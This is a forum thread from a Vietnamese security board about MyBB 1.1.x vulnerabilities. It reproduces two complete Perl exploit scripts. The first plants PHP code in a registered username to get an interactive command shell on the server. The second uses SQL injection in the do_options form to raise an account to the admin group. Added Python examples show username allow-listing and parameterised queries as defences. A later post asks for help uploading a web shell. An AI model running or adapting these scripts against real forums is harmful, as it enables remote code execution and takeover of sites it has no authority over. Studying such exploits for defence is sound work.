Forum Index » Information on new bugs and exploits » Improper user validation allows attackers to execute PHP code in myBB

Improper user validation allows attackers to execute PHP code in myBB | 21/06/2006 08:15:54 (+0700) | #1 | 563
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
MyBB (http://www.mybboard.com/) is a powerful, efficient and free forum package developed in PHP and MySQL.

Improper user validation allows attackers to execute PHP code in myBB.

Vulnerable Systems: MyBB version 1.1.2

Exploit:
Code:
#!/usr/bin/perl
# Tue Jun 13 12:37:12 CEST 2006 jolascoaga@514.es
#
# Exploit HOWTO - read this before flood my Inbox you bitch!
#
# - First you need to create the special user to do this use:
# ./mybibi.pl --host=http://www.example.com --dir=/mybb -1
#   this step needs a graphic confirmation so the exploit writes a file
#   in /tmp/file.png, you need to
#   see this img and put the text into the prompt. If everything is ok,
#   you'll have a new valid user created.
# * There is a file mybibi_out.html where the exploit writes the output
#   for debugging.
# - After you have created the exploit or if you have a valid non common
#   user, you can execute shell commands.
#
# TIPS:
#  * Sometimes you have to change the thread Id, --tid is your friend ;)
# * Don't forget to change the email. You MUST activate the account.
# * Better karate, even inside you.
#
# LIMITATIONS:
# * If the admin has the username length < 28 this exploit doesn't work
#
# Greetz to !dSR ppl and unsec
#
# 514 still r0xing!

# user config.
my $uservar = "C"; # don't use large vars.
my $password = "514r0x";
my $email = "514\@mailinator.com";

use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1;   # you can choose this or another one.

my ($proxy,$proxy_user,$proxy_pass, $username);
my ($host,$debug,$dir, $command, $del, $first_time, $tid);
my ($logged, $tid) = (0, 2);

$username = "'.system(getenv(HTTP_".$uservar.")).'";

my $options = GetOptions (
  'host=s'       => \$host,
  'dir=s'       => \$dir,
  'proxy=s'           => \$proxy,
  'proxy_user=s'      => \$proxy_user,
  'proxy_pass=s'      => \$proxy_pass,
  'debug'             => \$debug,
  '1'        => \$first_time,
  'tid=s'       => \$tid,
  'delete'       => \$del);

&help unless ($host); # please don't try this at home.

$dir = "/" unless($dir);
print "$host - $dir\n";
if ($host !~ /^http/) {
 $host = "http://".$host;
}

LWP::Debug::level('+') if $debug;
my ($res, $req);

my $ua = new LWP::UserAgent(
           cookie_jar=> { file => "$$.cookie" });
$ua->agent("Mothilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
$ua->proxy(['http'] => $proxy) if $proxy;
$req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

create_user() if $first_time;

while () {
  login() if !$logged;

  print "mybibi> "; # lost connection
  while(<STDIN>) {
    $command=$_;
    chomp($command);
    last;
  }
  &send($command);
}

sub send  {
 chomp (my $cmd = shift);
 my $h = $host.$dir."/newthread.php";
 my $req = POST $h, [
  'subject' => '514',
  'message' => '/slap 514',
  'previewpost' => 'Preview Post',
  'action' => 'do_newthread',
  'fid' => $tid,
  'posthash' => 'e0561b22fe5fdf3526eabdbddb221caa'
 ];
 $req->header($uservar => $cmd);
 print $req->as_string() if $debug;
 my $res = $ua->request($req);
 if ($res->content =~ /You may not post in this/) {
  print "[!] don't have perms to post. Change the Forum ID\n";
 } else {
  my ($data) = $res->content =~ m/(.*?)\<\!DOCT/is;
  print $data;
 }

}
sub login {
 my $h  = $host.$dir."/member.php";
 my $req = POST $h,[
  'username' => $username,
  'password' => $password,
  'submit' => 'Login',
  'action' => 'do_login'
 ];
 my $res = $ua->request($req);
 if ($res->content =~ /You have successfully been logged/is) {
  print "[*] Login successful!\n";
  $logged = 1;
 } else {
  print "[!] Error login-in\n";
 }
}

sub help {
    print "Syntax: ./$0 --host=url --dir=/mybb [options] -1 --tid=2\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "the default directory is /\n";
    print "\nExample\n";
    print "bash# $0 --host=http(s)://www.server.com/\n";
    print "\n";
    exit(1);
}

sub create_user {
 # first we need to get the img.
 my  $h = $host.$dir."/member.php";
 print "Host: $h\n";

 $req = HTTP::Request->new (GET => $h."?action=register");
 $res = $ua->request ($req);

 my $req = POST $h, [
  'action' => "register",
  'agree' => "I Agree"
 ];
 print $req->as_string() if $debug;
 $res = $ua->request($req);

 my $content = $res->content();
 $content =~ m/.*(image\.php\?action.*?)\".*/is;
 my $img = $1;
 my $req = HTTP::Request->new (GET => $host.$dir."/".$img);
 $res = $ua->request ($req);
 print $req->as_string();

 if ($res->content) {
  open (TMP, ">/tmp/file.png") or die($!);
  print TMP $res->content;
  close (TMP);
  print "[*] /tmp/file.png created.\n";
 }

 my ($hash) = $img =~ m/hash=(.*?)$/;
 my $img_str = get_img_str();
 unlink ("/tmp/file.png");
 $img_str =~ s/\n//g;
 my $req = POST $h, [
  'username' => $username,
  'password' => $password,
  'password2' => $password,
  'email' => $email,
  'email2' => $email,
  'imagestring' => $img_str,
  'imagehash' => $hash,
  'allownotices' => 'yes',
  'receivepms' => 'yes',
  'pmpopup' => 'no',
  'action' => "do_register",
  'regsubmit' => "Submit Registration"
 ];
 $res = $ua->request($req);
 print $req->as_string() if $debug;

 open (OUT, ">mybibi_out.html");
 print OUT $res->content;

 print "Check $email for confirmation or mybibi_out.html if there are some errors\n";
}

sub get_img_str ()
{
 print "\nNow I need the text shown in /tmp/file.png: ";
 my $str = <STDIN>;
 return $str;
}
exit 0;

# EoF
What brings us together is stronger than what pulls us apart.
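The exploit in the post above only works because the forum accepted a username that is literally a fragment of PHP, '.system(getenv(HTTP_C)).', and later used it unescaped. The natural fix on the defending side is strict allow-list validation at registration time. The following is an added example written for this thread; it is not MyBB code and not part of the original post. The length limits (3 to 30 characters), the allowed character set, the list of forbidden metacharacters and the sample registration attempts are assumptions constructed for illustration.

```python
"""Added example (not MyBB's code): allow-list validation for usernames
before they are stored, rendered in a template, or placed in a query.

The exploit's username, '.system(getenv(HTTP_C)).', is 26 characters of
PHP. A strict character allow-list rejects it on the registration form,
regardless of how the name would have been used afterwards.
"""
import re

# Assumed policy (hypothetical, not MyBB's): letters, digits, underscore and
# hyphen, optionally separated by single spaces, 3..30 characters in total.
USERNAME_RE = re.compile(r"[A-Za-z0-9_-]+(?: [A-Za-z0-9_-]+)*")
MIN_LEN, MAX_LEN = 3, 30

# Characters that must never reach PHP string contexts or SQL text; checked
# separately from the regex so the rejection reason names them explicitly.
META_CHARS = set("'\"`$\\;(){}<>")


def validate_username(raw: str) -> tuple[bool, str]:
    """Return (ok, reason). Reason is an empty string when the name is accepted."""
    name = raw.strip()
    if not MIN_LEN <= len(name) <= MAX_LEN:
        return False, f"length {len(name)} outside {MIN_LEN}..{MAX_LEN}"
    bad = sorted(META_CHARS & set(name))
    if bad:
        return False, "forbidden characters: " + "".join(bad)
    if not USERNAME_RE.fullmatch(name):
        return False, "outside allowed character set"
    return True, ""


def screen_registrations(attempts):
    """Run the validator over a batch of registration attempts and return a
    mapping of refused name -> reason (accepted names are omitted)."""
    refused = {}
    for name in attempts:
        ok, reason = validate_username(name)
        if not ok:
            refused[name] = reason
    return refused


# Constructed sample input: two ordinary names, the exploit's PHP-fragment
# username, and a name that is too short.
SAMPLE_ATTEMPTS = [
    "conmale",
    "lonely_Xorhandsome",
    "'.system(getenv(HTTP_C)).'",
    "ab",
]

if __name__ == "__main__":
    for name, why in screen_registrations(SAMPLE_ATTEMPTS).items():
        print(f"rejected {name!r}: {why}")
```

Validation is the first line, not the only one: the same name must still be escaped or bound as a parameter wherever it is later written into SQL or a template, since a policy that is relaxed in the future (Unicode names, apostrophes) would otherwise reopen the hole.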
Improper user validation allows attackers to execute PHP code in myBB | 26/06/2006 23:41:36 (+0700) | #2 | 986
lonely_Xorhandsome
Elite Member

Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
I have read this exploit code but I still don't understand any of it. Could you, conmale, explain the bug in this kind of forum in detail? Thank you very much.
Improper user validation allows attackers to execute PHP code in myBB | 27/06/2006 00:07:17 (+0700) | #3 | 1001
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under

lonely_Xorhandsome wrote:
I have read this exploit code but I still don't understand any of it. Could you, conmale, explain the bug in this kind of forum in detail? Thank you very much.

Then the first thing you need to do is study basic Perl.
What brings us together is stronger than what pulls us apart.
Improper user validation allows attackers to execute PHP code in myBB | 27/06/2006 00:14:15 (+0700) | #4 | 1007
DaoDuyHieu
HVA Friend

Joined: 14/04/2004 00:32:37
Messages: 200
Location: MICROSOFT
And here is another one:
Code:
#!/usr/bin/perl
# MyBulletinBoard (MyBB) <= 1.1.3 Create An Admin Exploit
#
# www.h4ckerz.com / hackerz.ir / aria-security.net / Myimei.com /
# ./2006-6-23
### Coded By Hessam-x / Hessamx-at-Hessamx.net

use IO::Socket; 
use LWP::UserAgent;
use HTTP::Cookies;


 $host = $ARGV[0];
 $uname = $ARGV[1];
 $passwd = $ARGV[2];
 $url = "http://".$host;
 
 print q(
 ###########################################################
 # MyBulletinBoard (MyBB) <= 1.1.3 Create An Admin Exploit #
 #           www.hackerz.ir - www.h4ckerz.com              #
 ################### Coded By Hessam-x #####################

);


 
 if (@ARGV < 3) {
 print " #  usage : hx.pl [host&path] [uname] [pass]\n"; 
 print " #  E.g : hx.pl www.milw0rm.com/mybb/ str0ke 123456\n"; 
  exit();
 }
 
    print " [~] User/Password : $uname/$passwd \n";
    print " [~] Host : $host \n";
    print " [~] Login ... ";


   
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

$xpl->cookie_jar( $cookie_jar );
 $res = $xpl->post($url.'member.php',
 Content => [
 "action"   => "do_login",
 "username"   => "$uname",
 "password"   => "$passwd",
 "submit"      => "Login",
 ],);
 
 if($cookie_jar->as_string =~ /mybbuser=(.*?);/) { 
  print "successfully .\n";
  } else { 
  print "UNsuccessfully !\n";
  print " [-] Can not Login In $host !\n"; 
  exit(); 
  }
 
$req = $xpl->get($url.'usercp.php?action=do_options&showcodebuttons=1\',additionalgroups=\'4');
$tst = $xpl->get($url.'index.php');
if ($tst->as_string =~ /Admin CP/) { 
print " [+] You Are Admin Now !!";
} else {
    print " [-] Exploit Failed !";
    }

# milw0rm.com [2006-06-25]


Great hopes make great men.
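The second exploit sends the value 1',additionalgroups='4 in the showcodebuttons field of the do_options form. That only escalates the account if the application splices the field into its UPDATE statement as raw text, so the closing quote ends the intended literal and the rest becomes a second column assignment. The block below is an added example for this thread, not MyBB's code and not taken from the exploit: a constructed in-memory sqlite3 table stands in for the users table, and the column names, the user id 7 and the 0/1 meaning of showcodebuttons are assumptions. It shows the string-built UPDATE being escalated by the payload and the parameterised UPDATE with integer coercion storing nothing but the flag; group 4 is the admin group as the thread states.

```python
"""Added example (not MyBB's code): why the do_options payload works and
what the parameterised version of the same update looks like.

A constructed sqlite3 table stands in for the users table. The column
names, uid 7 and the 0/1 semantics of showcodebuttons are assumptions.
"""
import sqlite3

# Constructed payload, the same value the exploit in the post above sends.
PAYLOAD = "1',additionalgroups='4"


def make_db():
    """In-memory users table holding one ordinary member (constructed)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (uid INTEGER, showcodebuttons TEXT, additionalgroups TEXT)"
    )
    db.execute("INSERT INTO users VALUES (7, '0', '')")
    return db


def update_options_vulnerable(db, uid, showcodebuttons):
    """String-built statement: the value closes the quoted literal and adds
    its own column assignment, so the statement still parses as one valid
    UPDATE and the extra column is written."""
    sql = (
        "UPDATE users SET showcodebuttons='" + showcodebuttons
        + "' WHERE uid=" + str(uid)
    )
    db.execute(sql)
    return sql


def update_options_safe(db, uid, showcodebuttons):
    """Coerce the option to the 0/1 it is allowed to be, then bind it as a
    parameter so no part of the submitted value reaches the SQL grammar."""
    try:
        flag = 1 if int(showcodebuttons) else 0
    except ValueError:
        flag = 0  # anything that is not an integer is treated as 'off'
    db.execute(
        "UPDATE users SET showcodebuttons=? WHERE uid=?", (str(flag), uid)
    )
    return flag


def groups_of(db, uid):
    """Read back additionalgroups for a user (empty string means no extra groups)."""
    row = db.execute(
        "SELECT additionalgroups FROM users WHERE uid=?", (uid,)
    ).fetchone()
    return row[0]


def demo():
    """Run the same payload through both versions and report the outcome."""
    vuln = make_db()
    update_options_vulnerable(vuln, 7, PAYLOAD)
    safe = make_db()
    update_options_safe(safe, 7, PAYLOAD)
    return {
        "vulnerable_groups": groups_of(vuln, 7),  # '4': escalated to admin group
        "safe_groups": groups_of(safe, 7),        # '': unchanged
    }


if __name__ == "__main__":
    for label, groups in demo().items():
        print(f"{label}: {groups!r}")
```

The important detail is that the payload never needs a second statement: it only adds a column to the existing SET list, so a driver that refuses multiple statements per call does not help. Only binding the value as a parameter (or, at minimum, escaping it and restricting it to the integer it is supposed to be) removes the problem.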
Improper user validation allows attackers to execute PHP code in myBB | 27/06/2006 05:21:47 (+0700) | #5 | 1154
dinhcaohack
Member

Joined: 22/04/2004 16:46:51
Messages: 41
==
The code below is probably a privilege-escalation exploit via
usercp.php?action=do_options&showcodebuttons=1
raising the account to group 4 (the admin group).
==
As for the code above: first, we have a username/password used to send MyBB a new topic like this:
'subject' => '514',
'message' => '/slap 514',
'previewpost' => 'Preview Post',
'action' => 'do_newthread',
'fid' => $tid,
'posthash' => 'e0561b22fe5fdf3526eabdbddb221caa'

then, it seems, it also uploads an image file (file.png) -> /tmp/file.png
P/S: the latter looks harder to understand and harder to exploit.
Improper user validation allows attackers to execute PHP code in myBB | 27/06/2006 07:23:24 (+0700) | #6 | 1223
Tinoo
Member

Joined: 26/06/2006 20:18:43
Messages: 3
Got into the ACP and tried to find a way to upload a shell but couldn't. Pros who know, please show me. Thx
Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 ©